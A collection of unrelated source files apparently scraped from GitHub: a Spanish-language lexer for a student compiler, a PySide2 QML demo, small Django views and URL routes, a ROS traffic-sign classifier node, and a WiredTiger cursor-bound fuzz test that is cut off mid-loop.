# Palabra Reservadas
self.fin_definicion_variables_globales = None # Inidica donde termina la definicion de
# Variables Globales
self.inicio_definicion_variables_locales = None # Indica donde inicia la definicion de
# Variables Locales en la funcion actual
self.fin_definicion_variables_locales = None # Indica donde finaliza la definicion de
# Variables locales en la funcion actual
self.error = Error()
self.cargar_palabras_reservadas() #Cargar las palabras reservadas en
#la tabla de simbolos.
def insertar_simbolo(self, simbolo): #inserta un nuevo simbolor en la TS.
if simbolo:
self.tablaSimb.append(simbolo)
return self.tablaSimb[len(self.tablaSimb)-1]
else:
raise ValueError("Se esperaba un simbolo")
def cargar_palabras_reservadas(self): #Carga las palabras reservadas en TS
for p in palabras_reservadas:
self.insertar_simbolo(Simbolo(p, TOKENS[p.upper()]))
self.fin_definicion_palabras_reservadas = len(self.tablaSimb)
def mostrar_tabla_simbolos(self): #muestra el contenido de la TS.
for s in self.tablaSimb:
print(s)
def buscar_lexema(self, lexema): #busca un lexema en la TS.
if self.zona_de_codigo == ZONA_DE_CODIGO['DEF_VARIABLES_GLOBALES']:
for simb in self.tablaSimb:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['DEF_VARIABLES_LOCALES']:
for simb in self.tablaSimb[self.inicio_definicion_variables_locales:]:
if lexema == simb.Lexema:
return simb
for simb in self.tablaSimb[:self.fin_definicion_palabras_reservadas]:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['CUERPO_FUNCION_LOCAL']:
for simb in self.tablaSimb[self.inicio_definicion_variables_locales:]:
if lexema == simb.Lexema:
return simb
for simb in self.tablaSimb[:self.fin_definicion_variables_globales]:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['CUERPO_PRINCIPAL']:
for simb in self.tablaSimb[:self.fin_definicion_variables_globales]:
if lexema == simb.Lexema:
return simb
return None
def tablaSimb2JSON(self): #regresa el contenido de TS en JSON
return json.dumps([obj.__dict__ for obj in self.tablaSimb])
def siguiente_caracter(self): #regresa el siguiente caracter del
self.index += 1 #codigo fuente.
try:
return self.codigo[self.index]
except IndexError:
return '\0'
def saltar_caracter(self): #ignora el caracter actual, por eje-
self.index += 1 #mplo: tabs, espacios, enters, etc.
self.inicioLex = self.index
def leer_lexema(self): #regresa la cadena que se encuentra
self.Lexema = self.codigo[self.inicioLex:self.index + 1]
self.estado = 0 #entre inicioLex y el index.
self.avanza_inicio_lexema()
return self.Lexema
def regresa_caracter(self): #Representa el (*) en un estado de
self.index -= 1 #aceptacion.
def avanza_inicio_lexema(self): #mueve el incioLex un caracter hacia
self.inicioLex = self.index + 1 #adelante
def deshacer_automata(self):
self.index = self.inicioLex
return self.codigo[self.index]
def siguiente_componente_lexico(self): #regresa el siguiente simbolo encon-
while(True): #trado en el codigo fuente.
if self.estado == 0:
c = self.siguiente_caracter()
if c ==' ' or c =='\t' or c == '\n':
self.avanza_inicio_lexema() #Ignorar todo tipo de espacios
if c == '\n': #en blanco
self.num_linea += 1 #incrementar num_line en enter.
elif c == '\0':
return None
elif c == '<':
self.estado = 1
elif c == '=':
self.estado = 5
elif c == '>':
self.estado = 6
else:
self.estado = self.fallo() #Probar el siguiente automata.
elif self.estado == 1:
c = self.siguiente_caracter() #Todos los estados intermedios
if c == '=': #deben llamar a siguiente_caracter
self.estado = 2
elif c == '>':
self.estado = 3
else:
self.estado = 4
elif self.estado == 2:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['MEI']))
elif self.estado == 3:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['DIF']))
elif self.estado == 4:
self.regresa_caracter()
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['MEN']))
elif self.estado == 5:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['IGU']))
elif self.estado == 6:
c = self.siguiente_caracter()
if c == '=':
self.estado = 7
else:
self.estado = 8
elif self.estado == 7:
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['MAI'])
elif self.estado == 8:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['MAY'])
elif self.estado == 9:
if c.isalpha():
self.estado = 10
else:
self.estado = self.fallo()
elif self.estado == 10:
c = self.siguiente_caracter()
if not c.isalnum():
self.estado = 11
elif self.estado == 11:
self.regresa_caracter()
self.leer_lexema()
simb = self.buscar_lexema(self.Lexema)
if self.zona_de_codigo == 0 or self.zona_de_codigo == 1:
if simb and simb.Token != TOKENS['ID']:
return simb
elif simb is None:
return self.insertar_simbolo(Simbolo(self.Lexema, TOKENS['ID'], self.tipo_de_dato_actual))
elif simb.Token == TOKENS['ID']:
self.error.reportar_error(self.num_linea, "Semantico", "La variable '{}' ya fue definida en el ambito actual.".format(self.Lexema))
return simb
elif self.zona_de_codigo == 2 or self.zona_de_codigo == 3:
if simb:
return simb
else:
self.error.reportar_error(self.num_linea, "Semantico", "La variable '{}' no fue declarada.".format(self.Lexema))
return self.insertar_simbolo(Simbolo(self.Lexema, TOKENS['ID'], TIPO_DATO['na']))
elif self.estado == 12:
if c.isdigit():
self.estado = 13
else:
self.estado = self.fallo()
elif self.estado == 13:
c = self.siguiente_caracter()
if c == 'E' or c == 'e':
self.estado = 16
elif c == '.':
self.estado = 14
elif not c.isdigit():
self.estado = 20
elif self.estado == 14:
c = self.siguiente_caracter()
if c.isdigit():
self.estado = 15
else:
self.estado = self.fallo()
elif self.estado == 15:
c = self.siguiente_caracter()
if c == 'E' or c == 'e':
self.estado = 16
elif not c.isdigit():
self.estado = 21
elif self.estado == 16:
c = self.siguiente_caracter()
if c == '+' or c == '-':
self.estado = 17
elif c.isdigit():
self.estado = 18
else:
self.es = self.fallo()
elif self.estado == 17:
c = self.siguiente_caracter()
if c.isdigit():
self.estado = 18
else: self.estado = self.fallo()
elif self.estado == 18:
c =self.siguiente_caracter()
if not c.isdigit():
self.estado = 19
elif self.estado == 19:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUMF'])
elif self.estado == 20:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUM'])
elif self.estado == 21:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUMF'])
elif self.estado == 22:
if c == '"':
self.estado = 23
else:
self.estado = self.fallo()
elif self.estado == 23:
c = self.siguiente_caracter()
if c == "\\":
self.estado = 24
elif c == '"':
self.estado = 25
elif self.estado == 24:
c = self.siguiente_caracter()
if c in 'nta"\\r':
self.estado = 23
else:
self.estado = self.fallo()
elif self.estado == 25:
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['CONST_STRING'])
elif self.estado == 26:
if c == "'":
self.estado = 27
else:
self.estado = self.fallo()
elif self.estado == 27:
c = self.siguiente_caracter()
if c == '\\':
self.estado = 28
else:
self.estado = 29
elif self.estado == 28:
c = self.siguiente_caracter()
if c in "nta'\\r":
self.estado = 29
else:
self.estado = self.fallo()
elif self.estado == 29:
c = self.siguiente_caracter()
if c == "'":
self.estado = 30
else:
self.estado = self.fallo()
elif self.estado == 30:
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['CONST_CHAR'])
elif self.estado == 31:
if c == "/":
self.estado = 32
else:
self.estado = self.fallo()
elif self.estado == 32:
c = self.siguiente_caracter()
if c == "/":
self.estado = 34
elif c == "*":
self.estado = 33
else:
c = self.deshacer_automata()
self.estado = self.fallo()
elif self.estado == 33:
c = self.siguiente_caracter()
if c == "*":
self.estado = 35
elif self.estado == 34:
c = self.siguiente_caracter()
if c == "\n" or c == "\0":
self.estado = 36
elif self.estado == 35:
c = self.siguiente_caracter()
if c == "/":
self.estado = 37
else:
self.estado = 33
elif self.estado == 36:
self.regresa_caracter()
self.leer_lexema()
elif self.estado == 37:
self.leer_lexema()
elif self.estado == 38:
if c in self.caracteres_permitidos:
self.leer_lexema()
return Simbolo(c,ord(c))
else:
self.estado = self.fallo()
else:
self.leer_lexema()
self.error.reportar_error(self.num_linea, "Lexico", "Simbolo no permitido '{}'.".format(self.Lexema))
def fallo(self):
if self.estado <= 8:
return 9
elif self.estado <= 11:
return 12
elif self.estado <= 21:
return 22
elif self.estado <= 25:
return 26
elif self.estado <= 30:
return 31
elif self.estado <= 37:
return 38
else:
return 99
| AbrahamupSky/Compilador | lexico/lexico.py | lexico.py | py | 12,471 | python | es | code | 1 | github-code | 36 |
17887984325 | from PySide2.QtCore import QUrl, QObject, Slot
from PySide2.QtGui import QGuiApplication
from PySide2.QtQuick import QQuickView
class MyClass(QObject):
@Slot(int, result=str) # 声明为槽,输入参数为int类型,返回值为str类型
def returnValue(self, value):
return str(value + 10)
if __name__ == '__main__':
path = 'src/demo1.qml'
app = QGuiApplication([])
view = QQuickView()
con = MyClass()
context = view.rootContext()
context.setContextProperty("con", con)
view.engine().quit.connect(app.quit)
view.setSource(QUrl(path))
view.show()
app.exec_()
| pyminer/pyminer | pyminer/widgets/widgets/basic/quick/demo1.py | demo1.py | py | 635 | python | en | code | 77 | github-code | 36 |
2153945744 | from django.shortcuts import render
product_price = {"라면":980,"홈런볼":1500,"칙촉":2300, "식빵":1800}
# Create your views here.
def price(request, thing, cnt):
if thing in product_price:
y_n = 'y'
price = product_price[thing]
else:
y_n = 'n'
price = 0
context = {
'y_n' : y_n,
'price' : price,
'thing' : thing,
'cnt' : cnt,
'total' : price * cnt
}
return render(request, 'prices/price.html', context) | ji-hyon/Web_study | Django/practice/part2_Django/django_2_1/project1/prices/views.py | views.py | py | 505 | python | en | code | 0 | github-code | 36 |
28536518861 | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import (
include,
url,
)
from django.contrib import admin
from classifier.views import CreateClassification
from healthcheck.views import HealthCheck
from report.views import CreateReport
from secret.views import Secret
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^auth/', include('djoser.urls')),
url(r'^auth/', include('djoser.urls.authtoken')),
url(
r'^classify-image',
CreateClassification.as_view(),
name='classify-image',
),
url(r'^health', HealthCheck.as_view(), name='healthcheck'),
url(r'^report', CreateReport.as_view(), name='report'),
url(r'^secret', Secret.as_view(), name='secret'),
]
| mechtron/coreys-image-classifier | api/project/urls.py | urls.py | py | 1,341 | python | en | code | 3 | github-code | 36 |
4308544287 | #!/usr/bin/env python3
import numpy as np
from tensorflow.keras.preprocessing.image import load_img, img_to_array
import rospy
from std_msgs.msg import UInt16
import os
from tensorflow.keras.models import load_model
def process_image(img_path):
img = load_img(img_path, target_size=(30, 30))
img = img_to_array(img)
img = np.expand_dims(img, axis=0)
return img
def predict_model(img_path, model):
labels = ['20 km/h', '30 km/h', '50 km/h', '60 km/h', '70 km/h', '80 km/h', '80 km/h end', '100 km/h',
'120 km/h', 'No overtaking', 'No overtaking for tracks', 'Crossroad with secondary way',
'Main road', 'Give way', 'Stop', 'Road up', 'Road up for track', 'Brock', 'Other dangerous',
'Turn left', 'Turn right', 'Winding road', 'Hollow road', 'Slippery road', 'Narrowing road',
'Roadwork', 'Traffic light', 'Pedestrian', 'Children', 'Bike', 'Snow', 'Deer', 'End of the limits',
'Only right', 'Only left', 'Only straight', 'Only straight and right', 'Only straight and left',
'Take right', 'Take left', 'Circle crossroad', 'End of overtaking limit', 'End of overtaking limit for track']
image = process_image(img_path)
pred = np.argmax(model.predict(image), axis=1)
prediction = labels[pred[0]]
print(prediction)
return prediction
def choose_way(sign):
msg = 0
if sign == 'Stop':
msg = 2
return msg
if sign == 'Only right':
msg = 3
return msg
if sign == 'Only left':
msg = 4
return msg
else:
msg = 1
return msg
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
MODEL_PATH = '/home/adam/catkin_ws/src/robot_tsr/script/model-1.h5'
# Loading the model back:
model = load_model(MODEL_PATH)
def main():
file_path = f'/home/adam/catkin_ws/src/robot_tsr/script/uploads/stop.jpeg'
sign = predict_model(file_path, model)
return sign
def talker():
signs_publisher = rospy.Publisher('dc_motors', UInt16, queue_size=10)
rospy.init_node('talker', anonymous=True)
rate = rospy.Rate(10) # 1hz
while not rospy.is_shutdown():
new_sign = main()
# Choose to right value
msg = choose_way(new_sign)
rospy.loginfo(msg)
signs_publisher.publish(msg)
rate.sleep()
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| FitAdam/Package-TSR-Robot-Ros | script/signs_pub.py | signs_pub.py | py | 2,438 | python | en | code | 0 | github-code | 36 |
36955296199 | import wiredtiger, wttest, string, random, time
from wtbound import *
from enum import Enum
from wtscenario import make_scenarios
class operations(Enum):
UPSERT = 1
REMOVE = 2
TRUNCATE = 3
class key_states(Enum):
UPSERTED = 1
DELETED = 2
NONE = 3
class bound_scenarios(Enum):
NEXT = 1
PREV = 2
SEARCH = 3
SEARCH_NEAR = 4
class bound_type(Enum):
LOWER = 1
UPPER = 2
class key():
key_state = key_states.NONE
data = -1
value = "none"
prepared = False
timestamp = 0
def __init__(self, data, value, key_state, timestamp):
self.key_state = key_state
self.data = data
self.value = value
self.timestamp = timestamp
def clear_prepared(self):
self.prepared = False
def is_prepared(self):
return self.prepared
def is_deleted(self):
return self.key_state == key_states.DELETED
def is_out_of_bounds(self, bound_set):
return not bound_set.in_bounds_key(self.data)
def is_deleted_or_oob(self, bound_set):
return self.is_deleted() or self.is_out_of_bounds(bound_set)
def update(self, value, key_state, timestamp, prepare):
self.value = value
self.key_state = key_state
self.timestamp = timestamp
self.prepared = prepare
def to_string(self):
return "Key: " + str(self.data) + ", state: " + str(self.key_state) + ", prepared: " + str(self.prepared)
def equals(self, key, value):
if (self.key_state == key_states.UPSERTED and self.data == key and self.value == value):
return True
else:
return False
# test_cursor_bound_fuzz.py
# A python test fuzzer that generates a random key range and applies bounds to it, then runs
# randomized operations and validates them for correctness.
class test_cursor_bound_fuzz(wttest.WiredTigerTestCase):
file_name = 'test_fuzz.wt'
iteration_count = 200 if wttest.islongtest() else 50
# For each iteration we do search_count searches that way we test more cases without having to
# generate as many key ranges.
search_count = 20
key_count = 10000 if wttest.islongtest() else 1000
# Large transactions throw rollback errors so we don't use them in the long test.
transactions_enabled = False if wttest.islongtest() else True
value_size = 100000 if wttest.islongtest() else 100
prepare_frequency = 5/100
update_frequency = 2/10
min_key = 1
# Max_key is not inclusive so the actual max_key is max_key - 1.
max_key = min_key + key_count
# A lot of time was spent generating values, to achieve some amount of randomness we pre
# generate N values and keep them in memory.
value_array = []
value_array_size = 20
current_ts = 1
applied_ops = False
key_range = {}
types = [
('file', dict(uri='file:')),
('table', dict(uri='table:'))
]
data_format = [
('row', dict(key_format='i')),
('column', dict(key_format='r'))
]
scenarios = make_scenarios(types, data_format)
# Iterates valid keys from min_key to max_key, the maximum key is defined as max_key - 1.
# Python doesn't consider the end of the range as inclusive.
def key_range_iter(self):
for i in range(self.min_key, self.max_key):
yield i
def dump_key_range(self):
for i in self.key_range_iter():
self.pr(self.key_range[i].to_string())
# Generate a random ascii value.
def generate_value(self):
return ''.join(random.choice(string.ascii_lowercase) for _ in range(self.value_size))
# Get a value from the value array.
def get_value(self):
return self.value_array[random.randrange(self.value_array_size)]
# Get a key within the range of min_key and max_key.
def get_random_key(self):
return random.randrange(self.min_key, self.max_key)
# Update a key using the cursor and update its in memory representation.
def apply_update(self, cursor, key_id, prepare):
value = self.get_value()
cursor[key_id] = value
self.key_range[key_id].update(value, key_states.UPSERTED, self.current_ts, prepare)
self.verbose(3, "Updating " + self.key_range[key_id].to_string())
# Remove a key using the cursor and mark it as deleted in memory.
# If the key is already deleted we skip the remove.
def apply_remove(self, cursor, key_id, prepare):
if (self.key_range[key_id].is_deleted()):
return
cursor.set_key(key_id)
self.assertEqual(cursor.remove(), 0)
self.key_range[key_id].update(None, key_states.DELETED, self.current_ts, prepare)
self.verbose(3, "Removing " + self.key_range[key_id].to_string())
# Apply a truncate operation to the key range.
def apply_truncate(self, session, cursor, cursor2, prepare):
lower_key = self.get_random_key()
if (lower_key + 1 < self.max_key):
upper_key = random.randrange(lower_key + 1, self.max_key)
cursor.set_key(lower_key)
cursor2.set_key(upper_key)
self.assertEqual(session.truncate(None, cursor, cursor2, None), 0)
# Mark all keys from lower_key to upper_key as deleted.
for key_id in range(lower_key, upper_key + 1):
self.key_range[key_id].update(None, key_states.DELETED, self.current_ts, prepare)
self.verbose(3, "Truncated keys between: " + str(lower_key) + " and: " + str(upper_key))
# Each iteration calls this function once to update the state of the keys in the database and
# in memory.
def apply_ops(self, session, cursor, prepare):
op = random.choice(list(operations))
if (op is operations.TRUNCATE and self.applied_ops):
cursor2 = session.open_cursor(self.uri + self.file_name)
self.apply_truncate(session, cursor, cursor2, prepare)
else:
for i in self.key_range_iter():
if (random.uniform(0, 1) < self.update_frequency):
continue
op = random.choice(list(operations))
if (op is operations.TRUNCATE):
pass
elif (op is operations.UPSERT):
self.apply_update(cursor, i, prepare)
elif (op is operations.REMOVE):
self.apply_remove(cursor, i, prepare)
else:
raise Exception("Unhandled operation generated")
self.applied_ops = True
# As prepare throws a prepare conflict exception we wrap the call to anything that could
# encounter a prepare conflict in a try except, we then return the error code to the caller.
def prepare_call(self, func):
try:
ret = func()
except wiredtiger.WiredTigerError as e:
if wiredtiger.wiredtiger_strerror(wiredtiger.WT_PREPARE_CONFLICT) in str(e):
ret = wiredtiger.WT_PREPARE_CONFLICT
else:
raise e
return ret
# Once we commit the prepared transaction, update and clear the prepared flags.
def clear_prepare_key_ranges(self):
for i in self.key_range_iter():
self.key_range[i].clear_prepared()
# Given a bound, this functions returns the start or end expected key of the bounded range.
# Note the type argument determines if we return the start or end limit. e.g. if we have a lower
# bound then the key would be the lower bound, however if the lower bound isn't enabled then the
# lowest possible key would be min_key. max_key isn't inclusive so we subtract 1 off it.
def get_expected_limit_key(self, bound_set, type):
if (type == bound_type.LOWER):
if (bound_set.lower.enabled):
if (bound_set.lower.inclusive):
return bound_set.lower.key
return bound_set.lower.key + 1
return self.min_key
if (bound_set.upper.enabled):
if (bound_set.upper.inclusive):
return bound_set.upper.key
return bound_set.upper.key - 1
return self.max_key - 1
# When a prepared cursor walks next or prev it can skip deleted records internally before
# returning a prepare conflict, we don't know which key it got to so we need to validate that
# we see a series of deleted keys followed by a prepared key.
def validate_deleted_prepared_range(self, start_key, end_key, next):
if (next):
step = 1
else:
step = -1
self.verbose(3, "Walking deleted range from: " + str(start_key) + " to: " + str(end_key))
for i in range(start_key, end_key, step):
self.verbose(3, "Validating state of key: " + self.key_range[i].to_string())
if (self.key_range[i].is_prepared()):
return
elif (self.key_range[i].is_deleted()):
continue
else:
self.assertTrue(False)
# Validate a prepare conflict in the cursor->next scenario.
def validate_prepare_conflict_next(self, current_key, bound_set):
self.verbose(3, "Current key is: " + str(current_key) + " min_key is: " + str(self.min_key))
start_range = None
if current_key == self.min_key:
# We hit a prepare conflict while walking forwards before we stepped to a valid key.
# Therefore validate all the keys from start of the range are deleted followed by a prepare.
start_range = self.get_expected_limit_key(bound_set, bound_type.LOWER)
else:
# We walked part of the way through a valid key range before we hit the prepared
# update. Therefore validate the range between our current key and the
# end range.
start_range = current_key
end_range = self.get_expected_limit_key(bound_set, bound_type.UPPER)
# Perform validation from the start range to end range.
self.validate_deleted_prepared_range(start_range, end_range, True)
# Validate a prepare conflict in the cursor->prev scenario.
def validate_prepare_conflict_prev(self, current_key, bound_set):
self.verbose(3, "Current key is: " + str(current_key) + " max_key is: " + str(self.max_key))
start_range = None
if current_key == self.max_key - 1:
# We hit a prepare conflict while walking backwards before we stepped to a valid key.
# Therefore validate all the keys from start of the range are deleted followed by a
# prepare.
start_range = self.get_expected_limit_key(bound_set, bound_type.UPPER)
else:
# We walked part of the way through a valid key range before we hit the prepared
# update. Therefore validate the range between our current key and the
# end range.
start_range = current_key
end_range = self.get_expected_limit_key(bound_set, bound_type.LOWER)
# Perform validation from the start range to end range.
self.validate_deleted_prepared_range(start_range, end_range, False)
# Walk the cursor using cursor->next and validate the returned keys.
def run_next(self, bound_set, cursor):
# This array gives us confidence that we have validated the full key range.
checked_keys = []
self.verbose(3, "Running scenario: NEXT")
key_range_it = self.min_key - 1
ret = self.prepare_call(lambda: cursor.next())
while (ret != wiredtiger.WT_NOTFOUND and ret != wiredtiger.WT_PREPARE_CONFLICT):
current_key = cursor.get_key()
current_value = cursor.get_value()
self.verbose(3, "Cursor next walked to key: " + str(current_key) + " value: " + current_value)
self.assertTrue(bound_set.in_bounds_key(current_key))
self.assertTrue(self.key_range[current_key].equals(current_key, current_value))
checked_keys.append(current_key)
# If the cursor has walked to a record that isn't +1 our current record then it
# skipped something internally.
# Check that the key range between key_range_it and current_key isn't visible
if (current_key != key_range_it + 1):
for i in range(key_range_it + 1, current_key):
self.verbose(3, "Checking key is deleted or oob: " + str(i))
checked_keys.append(i)
self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
key_range_it = current_key
ret = self.prepare_call(lambda: cursor.next())
key_range_it = key_range_it + 1
# If we were returned a prepare conflict it means the cursor has found a prepared key/value.
# We need to validate that it arrived there correctly using the in memory state of the
# database. We cannot continue from a prepare conflict so we return.
if (ret == wiredtiger.WT_PREPARE_CONFLICT):
self.validate_prepare_conflict_next(key_range_it, bound_set)
return
# If key_range_it is < key_count then the rest of the range was deleted
# Remember to increment it by one to get it to the first not in bounds key.
for i in range(key_range_it, self.max_key):
checked_keys.append(i)
self.verbose(3, "Checking key is deleted or oob: " + str(i))
self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
self.assertTrue(len(checked_keys) == self.key_count)
# Walk the cursor using cursor->prev and validate the returned keys.
def run_prev(self, bound_set, cursor):
# This array gives us confidence that we have validated the full key range.
checked_keys = []
self.verbose(3, "Running scenario: PREV")
ret = self.prepare_call(lambda: cursor.prev())
key_range_it = self.max_key
while (ret != wiredtiger.WT_NOTFOUND and ret != wiredtiger.WT_PREPARE_CONFLICT):
current_key = cursor.get_key()
current_value = cursor.get_value()
self.verbose(3, "Cursor prev walked to key: " + str(current_key) + " value: " + current_value)
self.assertTrue(bound_set.in_bounds_key(current_key))
self.assertTrue(self.key_range[current_key].equals(current_key, current_value))
checked_keys.append(current_key)
# If the cursor has walked to a record that isn't -1 our current record then it
# skipped something internally.
# Check that the key range between key_range_it and current_key isn't visible
if (current_key != key_range_it - 1):
# Check that the key range between key_range_it and current_key isn't visible
for i in range(current_key + 1, key_range_it):
self.verbose(3, "Checking key is deleted or oob: " + str(i))
checked_keys.append(i)
self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
key_range_it = current_key
ret = self.prepare_call(lambda: cursor.prev())
# If key_range_it is > key_count then the rest of the range was deleted
key_range_it -= 1
if (ret == wiredtiger.WT_PREPARE_CONFLICT):
self.validate_prepare_conflict_prev(key_range_it, bound_set)
return
for i in range(self.min_key, key_range_it + 1):
checked_keys.append(i)
self.verbose(3, "Checking key is deleted or oob: " + str(i))
self.assertTrue(self.key_range[i].is_deleted_or_oob(bound_set))
self.assertTrue(len(checked_keys) == self.key_count)
# Run basic cursor->search() scenarios and validate the outcome.
def run_search(self, bound_set, cursor):
# Choose a N random keys and perform a search on each
for i in range(0, self.search_count):
search_key = self.get_random_key()
cursor.set_key(search_key)
ret = self.prepare_call(lambda: cursor.search())
if (ret == wiredtiger.WT_PREPARE_CONFLICT):
self.assertTrue(self.key_range[search_key].is_prepared())
elif (ret == wiredtiger.WT_NOTFOUND):
self.assertTrue(self.key_range[search_key].is_deleted_or_oob(bound_set))
elif (ret == 0):
# Assert that the key exists, and is within the range.
self.assertTrue(self.key_range[search_key].equals(cursor.get_key(), cursor.get_value()))
self.assertTrue(bound_set.in_bounds_key(cursor.get_key()))
else:
raise Exception('Unhandled error returned by search')
# Check that all the keys within the given bound_set are deleted.
def check_all_within_bounds_not_visible(self, bound_set):
for i in range(bound_set.start_range(self.min_key), bound_set.end_range(self.max_key)):
self.verbose(3, "checking key: " +self.key_range[i].to_string())
if (not self.key_range[i].is_deleted()):
return False
return True
# Run a cursor->search_near scenario and validate that the outcome was correct.
def run_search_near(self, bound_set, cursor):
# Choose N random keys and perform a search near.
for i in range(0, self.search_count):
search_key = self.get_random_key()
cursor.set_key(search_key)
self.verbose(3, "Searching for key: " + str(search_key))
ret = self.prepare_call(lambda: cursor.search_near())
if (ret == wiredtiger.WT_NOTFOUND):
self.verbose(3, "Nothing visible checking.")
# Nothing visible within the bound range.
# Validate.
elif (ret == wiredtiger.WT_PREPARE_CONFLICT):
# Due to the complexity of the search near logic we will simply check if there is
# a prepared key within the range.
found_prepare = False
for i in range(bound_set.start_range(self.min_key), bound_set.end_range(self.max_key)):
if (self.key_range[i].is_prepared()):
found_prepare = True
break
self.assertTrue(found_prepare)
self.verbose(3, "Received prepare conflict in search near.")
else:
key_found = cursor.get_key()
self.verbose(3, "Found a key: " + str(key_found))
current_key = key_found
# Assert the value we found matches.
# Equals also validates that the key is visible.
self.assertTrue(self.key_range[current_key].equals(current_key, cursor.get_value()))
if (bound_set.in_bounds_key(search_key)):
# We returned a key within the range, validate that key is the one that
# should've been returned.
if (key_found == search_key):
# We've already determined the key matches. We can return.
pass
if (key_found > search_key):
# Walk left and validate that all isn't visible to the search key.
while (current_key != search_key):
current_key = current_key - 1
self.assertTrue(self.key_range[current_key].is_deleted())
if (key_found < search_key):
# Walk right and validate that all isn't visible to the search key.
while (current_key != search_key):
current_key = current_key + 1
self.assertTrue(self.key_range[current_key].is_deleted())
else:
# We searched for a value outside our range, we should return whichever value
# is closest within the range.
if (bound_set.lower.enabled and search_key <= bound_set.lower.key):
# We searched to the left of our bounds. In the equals case the lower bound
# must not be inclusive.
# Validate that the we returned the nearest value to the lower bound.
if (bound_set.lower.inclusive):
self.assertTrue(key_found >= bound_set.lower.key)
current_key = bound_set.lower.key
else:
self.assertTrue(key_found > bound_set.lower.key)
current_key = bound_set.lower.key + 1
while (current_key != key_found):
self.assertTrue(self.key_range[current_key].is_deleted())
current_key = current_key + 1
elif (bound_set.upper.enabled and search_key >= bound_set.upper.key):
# We searched to the right of our bounds. In the equals case the upper bound
# must not be inclusive.
# Validate that the we returned the nearest value to the upper bound.
if (bound_set.upper.inclusive):
self.assertTrue(key_found <= bound_set.upper.key)
current_key = bound_set.upper.key
else:
self.assertTrue(key_found < bound_set.upper.key)
current_key = bound_set.upper.key - 1
while (current_key != key_found):
self.assertTrue(self.key_range[current_key].is_deleted())
current_key = current_key - 1
else:
raise Exception('Illegal state found in search_near')
# Choose a scenario and run it.
def run_bound_scenarios(self, bound_set, cursor):
scenario = random.choice(list(bound_scenarios))
if (scenario is bound_scenarios.NEXT):
self.run_next(bound_set, cursor)
elif (scenario is bound_scenarios.PREV):
self.run_prev(bound_set, cursor)
elif (scenario is bound_scenarios.SEARCH):
self.run_search(bound_set, cursor)
elif (scenario is bound_scenarios.SEARCH_NEAR):
self.run_search_near(bound_set, cursor)
else:
raise Exception('Unhandled bound scenario chosen')
# Generate a set of bounds and apply them to the cursor.
def apply_bounds(self, cursor):
cursor.reset()
lower = bound(self.get_random_key(), bool(random.getrandbits(1)), bool(random.getrandbits(1)))
upper = bound(random.randrange(lower.key, self.max_key), bool(random.getrandbits(1)), bool(random.getrandbits(1)))
# Prevent invalid bounds being generated.
if (lower.key == upper.key and lower.enabled and upper.enabled):
lower.inclusive = upper.inclusive = True
bound_set = bounds(lower, upper)
if (lower.enabled):
cursor.set_key(lower.key)
cursor.bound("bound=lower,inclusive=" + lower.inclusive_str())
if (upper.enabled):
cursor.set_key(upper.key)
cursor.bound("bound=upper,inclusive=" + upper.inclusive_str())
return bound_set
# The primary test loop is contained here.
def test_bound_fuzz(self):
uri = self.uri + self.file_name
create_params = 'value_format=S,key_format={}'.format(self.key_format)
# Reset the key range for every scenario.
self.key_range = {}
# Setup a reproducible random seed.
# If this test fails inspect the file WT_TEST/results.txt and replace the time.time()
# with a given seed. e.g.:
# seed = 1660215872.5926154
# Additionally this test is configured for verbose logging which can make debugging a bit
# easier.
seed = time.time()
self.pr("Using seed: " + str(seed))
random.seed(seed)
self.session.create(uri, create_params)
read_cursor = self.session.open_cursor(uri)
write_session = self.setUpSessionOpen(self.conn)
write_cursor = write_session.open_cursor(uri)
# Initialize the value array.
self.verbose(3, "Generating value array")
for i in range(0, self.value_array_size):
self.value_array.append(self.generate_value())
# Initialize the key range.
for i in self.key_range_iter():
key_value = self.get_value()
self.key_range[i] = key(i, key_value, key_states.UPSERTED, self.current_ts)
self.current_ts += 1
if (self.transactions_enabled):
write_session.begin_transaction()
write_cursor[i] = key_value
if (self.transactions_enabled):
write_session.commit_transaction('commit_timestamp=' + self.timestamp_str(self.key_range[i].timestamp))
self.session.checkpoint()
# Begin main loop
for i in range(0, self.iteration_count):
self.verbose(3, "Iteration: " + str(i))
bound_set = self.apply_bounds(read_cursor)
self.verbose(3, "Generated bound set: " + bound_set.to_string())
# Check if we are doing a prepared transaction on this iteration.
prepare = random.uniform(0, 1) <= self.prepare_frequency and self.transactions_enabled
if (self.transactions_enabled):
write_session.begin_transaction()
self.apply_ops(write_session, write_cursor, prepare)
if (self.transactions_enabled):
if (prepare):
self.verbose(3, "Preparing applied operations.")
write_session.prepare_transaction('prepare_timestamp=' + self.timestamp_str(self.current_ts))
else:
write_session.commit_transaction('commit_timestamp=' + self.timestamp_str(self.current_ts))
# Use the current timestamp so we don't need to track previous versions.
